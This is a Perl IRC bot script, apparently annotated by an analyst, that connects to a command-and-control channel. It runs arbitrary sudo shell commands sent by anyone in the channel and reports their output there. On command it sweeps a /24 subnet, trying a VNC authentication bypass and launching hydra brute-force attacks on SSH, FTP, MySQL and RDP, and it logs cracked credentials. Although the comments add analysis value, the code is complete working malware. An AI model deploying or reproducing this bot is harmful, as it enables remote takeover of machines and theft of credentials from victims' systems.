#For educational purposes or for use on your network only
#This script has been modified from the original source.
#Thanks to the real owner of it.
#Get on my IRC Network if you need explanations on how you can use this script.
use IO::Socket;
use IO::Socket::INET;
use threads;
use threads::shared;
use Errno qw(EAGAIN);
use warnings;
# Globals and command-and-control setup for the IRC bot.
#
# Network indicators visible in this section: a plaintext TCP connection to
# $ircnet on port $secureport (6667), a NICK of the form "b0t" followed by up
# to five digits (int(rand(99999))), and the literal USER realname
# "Robot made by independent".
my $lines;                               # never read here; the !list loop declares its own `my $lines`
our @results : shared;                   # per-host result strings indexed by last octet (filled in Scan_ALL)
                                         # `: shared` only spans threads; this listing forks (DivideWork) and
                                         # never creates a thread, so a child's writes stay in that child
our $todo = 0;                           # work-slice id, extended one bit per fork in DivideWork
our $contatore = 0;                      # not referenced anywhere in this listing
my $orig_thread = "yes";                 # set to "no" in forked children; never read afterwards
my $start;                               # first/last host number this process scans (computed in !scan)
my $end;
my $out_file;                            # not referenced anywhere in this listing
my $range = 99999;
my $random_number = int(rand($range));   # 0 .. 99998, used only to build the nick
my @VNC_PORTS = qw/5900 5901 5902 5903 5904 5905 5906 5907 5908 5909/;   # probed one by one in Scan_ALL
my @hydra_PORTS  = ( [3306, 'MySQL'], [22, 'SSH'], [21, 'FTP'], [3389, 'RDP'] );   # [port, hydra module name]
my $splits = 8; # Creates 2^N processes.
                # With 8 splits every !scan forks 256 processes, one per host number (see the !scan arithmetic).
our $subnet;                             # "a.b.c." prefix set by !scan, read by Scan_ALL
my $nick = "b0t$random_number";# nick
my $secureport = "6667";                 # C2 port; plain TCP, no TLS anywhere in this listing despite the name
my $ircnet = "irc-1.iownyour.biz";       # C2 host
my $canale = "#powercc";                 # C2 channel: every command is read from it and every result is sent to it
my $answer;                              # current raw line read from the IRC socket
# Connect and register with the C2 server; the bot dies outright if it is unreachable.
my $sk = IO::Socket::INET->new(PeerAddr=>"$ircnet",PeerPort=>"$secureport",Proto=>"tcp") or die "Can not connect on server!\n";
$sk->autoflush(1);
print $sk "USER $nick 0 * :Robot made by independent \r\n";
print $sk "NICK $nick \r\n";
36
37
 # Main C2 loop: one iteration per raw line received from the IRC socket.
 # Each command is matched anywhere in the line and nothing checks who sent
 # it (no nick or hostmask comparison), so any channel participant, or anyone
 # who can get text into the channel, can drive the bot.
 while ($answer = <$sk>) {
   
	if($answer =~ m/^PING (.*?)$/gi) #Answer ping requests
	{
	    
		print $sk "PONG ".$1."\r\n";
		print $sk "JOIN $canale \r\n";      # (re)joins the channel on every server PING
	}
    if ($answer=~ /!help/) {
    printa("Scan by independent: list , reload , die , sudo <cmd> , scan <ip>");
  }
  if ($answer=~ /!list/)
  {
 
    # Replays lines containing "host" from the hydra output file (Scan_ALL appends to it).
    # If the file is missing, $fh stays undef and the loop below simply reads nothing (plus warnings).
    my $file = 'xploits.log';
    open my $fh, '<', $file or warn "Could not open '$file' $!\n";
 
    while (my $lines = <$fh>) {
      chomp $lines;
      if ($lines=~ /host/) {
        printa("$lines");
      }
    }
  }
  if ($answer=~ /!reload/)
  {
    printa("Reloading...");
    # One-string system() runs through the shell; "pkill perl" also matches this bot's own process.
    my @cmd = ("sudo pkill perl && sudo perl scan.pl && sudo pkill hydra");
    system(@cmd);
  }
  if ($answer=~ /!die/)
  {
    printa("Dying...");
    my @cmd = ("sudo pkill perl && sudo pkill hydra");
    system(@cmd);
  }
  if ($answer=~ /!sudo\s+(.*)/)
  {
        # Remote command execution: the rest of the line is run through the shell under sudo
        # (backticks) and every output line is echoed back to the channel via printa.
        my $command = $1;
        printa("Done: $command ");
    my $cmd = "sudo $command";
    my @output = `$cmd 2>&1 3>&1`;         # stderr merged into stdout; 3>&1 only matters if the command writes fd 3
    foreach(@output) {
      printa("$_\r\n");
    }
  }
 
 
  if ($answer=~ /!scan (.+)/)
  {
 
 
    $todo = 0;
    $subnet = $1;
    # Accepts anything that starts with three dotted octets and keeps only that prefix;
    # the fourth octet and whatever follows it are discarded.
    if ($subnet =~ m/^\d{1,3}\.\d{1,3}\.\d{1,3}\.?\*?/) {
      $subnet =~ s/^(\d{1,3}\.\d{1,3}\.\d{1,3}).*/$1/;
      $subnet .= ".";
      printa("Scanning subnet ${subnet}x\n");   # sent once, before forking
 
      # $splits is a fixed constant above, so this guard never fires in this listing.
      CHECK: {
        unless ($splits >= 0 && $splits <= 8) {
          die "ERROR: Do not split $splits times--that makes no sense.\n";
        }
      }
 
      # Ugly, but this works.
      # Each call forks once; after $splits calls every surviving process holds a
      # distinct $todo in 0 .. 2**$splits-1 (see DivideWork). Children never exit.
      DivideWork() if $splits >= 1;
      DivideWork() if $splits >= 2;
      DivideWork() if $splits >= 3;
      DivideWork() if $splits >= 4;
      DivideWork() if $splits >= 5;
      DivideWork() if $splits >= 6;
      DivideWork() if $splits >= 7;
      DivideWork() if $splits >= 8;
 
      # Slice of the /24 for this process. With $splits == 8: $start == $end == $todo,
      # i.e. exactly one host per process.
      $start = $todo << (8 - $splits);
      $end = $start + (256 / (2**$splits)) - 1;
 
      foreach ($start .. $end) {
 
        Scan_ALL($_);
 
      }
     }
   
   else {
      printa("Are you brain-dead? Use a correct IP format. ");
    }
 
    # Nothing exits the forked children here: after their slice they fall back
    # into this loop, all reading the same inherited IRC socket $sk.
  }
 
}
  ####################################
  # Fork once and extend the global $todo by one bit: the parent keeps bit 1,
  # the child bit 0. Called $splits times in a row from !scan, which leaves the
  # 2**$splits surviving processes with distinct $todo values. The child path
  # does not exit; both sides return to the caller and keep running the same code.
  sub DivideWork {
    my $pid;
 
    FORK: {
      $todo *= 2;                         # re-run on `redo FORK`, so an EAGAIN retry doubles $todo a second time
      if ($pid = fork) {
        # Parent
        ++$todo;
 
        } elsif (defined $pid) {
        # Child
        $orig_thread = "no";              # nothing reads this afterwards
 
        } elsif ($! == EAGAIN) {
        # Recoverable forking error.
        sleep 7;
        redo FORK;
 
        } else {
        # Unable to fork.
        printa("Unable to fork: $!\n");   # reported to the channel; execution continues with $todo already doubled
 
      }
    }
  }
  # Probe a single host ($subnet . $hostnum).
  #
  # Stage 1: every port in @VNC_PORTS gets a hand-rolled VNC handshake that
  # answers the security-type list with a single 0x01 byte (the "no
  # authentication" claim in the comments below) and reports to the channel if
  # the server keeps sending data afterwards.
  # Stage 2: the first port in @hydra_PORTS that accepts a TCP connection is
  # handed to an external "sudo hydra" run whose output is appended to
  # xploits.log, the file the !list command later replays.
  #
  # Host-side artefacts of this routine: a process tree perl -> sh -> sudo ->
  # hydra, wordlists read from /user and /pass, xploits.log in the working
  # directory, and a sudo log entry per hydra run. On the wire, every open
  # VNC port and every hydra start is announced on the C2 channel via printa
  # before any result is known.
  sub Scan_ALL {
    my $hostnum = shift;
    my $host = $subnet . $hostnum;
    my $sock;                             # never assigned: both loops below declare their own `my $sock`
    my $proto_ver;
    my $ignored;
    my $auth_type;
    my $sec_types;
    my $vnc_data;
    $host or printa("ERROR: missing Host IP address Scan_ALL.");
 
    # The host numbers .0 and .255 are reserved; ignore them.
    if ($hostnum <= 0 or $hostnum >= 255) { return; }
 
    # Format things nicely--that crazy formula just adds spaces.
    # $hostnum is 1..254 here, so log() is always defined.
    $results[$hostnum] = "$host";
    $results[$hostnum] .= (" " x (4 - int(log($hostnum)/log(10)))) . " = ";
    foreach my $porti (@VNC_PORTS)
    {
      if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti, Proto => 'tcp')) {
 
        # Read 12 bytes (the server's version string, judging by the name) and send them straight back.
        $sock->read($proto_ver, 12);
        print $sock $proto_ver;
 
        # Get supported security types and ignore them.
        $sock->read($sec_types, 1);
 
        $sock->read($ignored, unpack('C', $sec_types));
        # Claim that we only support no authentication.
        print $sock "\x01";
 
 
        # We should get "0000" back, indicating that they won't fall back to no authentication.
        # $auth_type is read but never inspected; the decision is made on $vnc_data below.
        $sock->read($auth_type, 4);
        # Client initialize.
        print $sock "\x01";
 
        # If the server starts sending data, we're in.
        $sock->read($vnc_data, 4);
        printa("[Xploiting VNC] $host");   # announced for every host with an open VNC port, result not yet known
        # Any non-zero 4 bytes count as success; a short or empty read presumably unpacks to nothing (false).
        if (unpack('I', $vnc_data)) {
          $results[$hostnum] .= "VNC Vulnerable: $proto_ver\n";
          # "9,3" looks like an mIRC colour code whose \x03 control byte was lost in the paste — can't confirm here.
          printa("9,3 [ $porti ] $results[$hostnum] $porti ");
        }
      }
    }
    foreach my $porti (@hydra_PORTS)
    {
      if (my $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $porti->[0], Proto => 'tcp')) {
        close($sock);                     # the connection is only an open-port check
        printa("[Cracking " . $porti->[1] . "] $host");
        # One-string system() so the shell handles the >> redirection into xploits.log.
        # Module name is the lowercased label from @hydra_PORTS; -L/-P are the username/password lists.
        my @cmdhydra = ("sudo hydra -F -L /user -P /pass $host " . lc($porti->[1]) . " -s " . $porti->[0] . " -v -t 4 -W3 >>xploits.log");
        system(@cmdhydra);
        return;                           # only the first open port per host is handed to hydra
      }
    }
 
    close($sock);                         # the outer $sock was never opened, so this closes undef
    return;
  }
  # Send the first argument to the C2 channel as a PRIVMSG (with a trailing
  # ". "). Every report the bot makes — scan hits and the full output of !sudo
  # commands — leaves the host through this one call, over the plaintext
  # socket opened at the top of the script. Only $_[0] is used; extra
  # arguments are ignored. "4,5" looks like an mIRC colour code whose \x03
  # control byte was lost in the paste — can't confirm from here.
  sub printa {
    print $sk "PRIVMSG $canale :4,5 $_[0]. \r\n";
  }